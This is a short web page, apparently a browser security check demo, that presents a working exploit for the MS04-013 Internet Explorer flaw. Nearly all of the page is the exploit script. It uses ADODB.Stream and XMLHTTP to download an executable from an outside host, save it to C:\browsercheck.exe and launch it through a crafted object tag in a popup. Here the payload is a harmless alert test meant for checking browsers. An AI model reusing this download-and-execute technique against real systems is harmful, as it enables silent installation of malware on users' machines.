Original ADODB demo
This demo exploit tries to create and execute the file C:\browsercheck.exe. See:
MS04-013
Start demo
s=new ActiveXObject("ADODB.Stream"); s.Mode=3; s.Type=1; s.Open(); x=new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET","http://www.heise.de/security/dienste/browsercheck/demos/ie/alert.exe",0); x.Send(); s.Write(x.responseBody); s.SaveToFile("C:\\browsercheck.exe",2);
md="<object id=\"oFile\""+ " classid=\"clsid:11111111-1111-1111-1111-111111111111\""+ " codebase=\"c:/windows/temp/browsercheck.exe\"></object>"; w=createPopup(); w.document.clear(); w.document.write(md);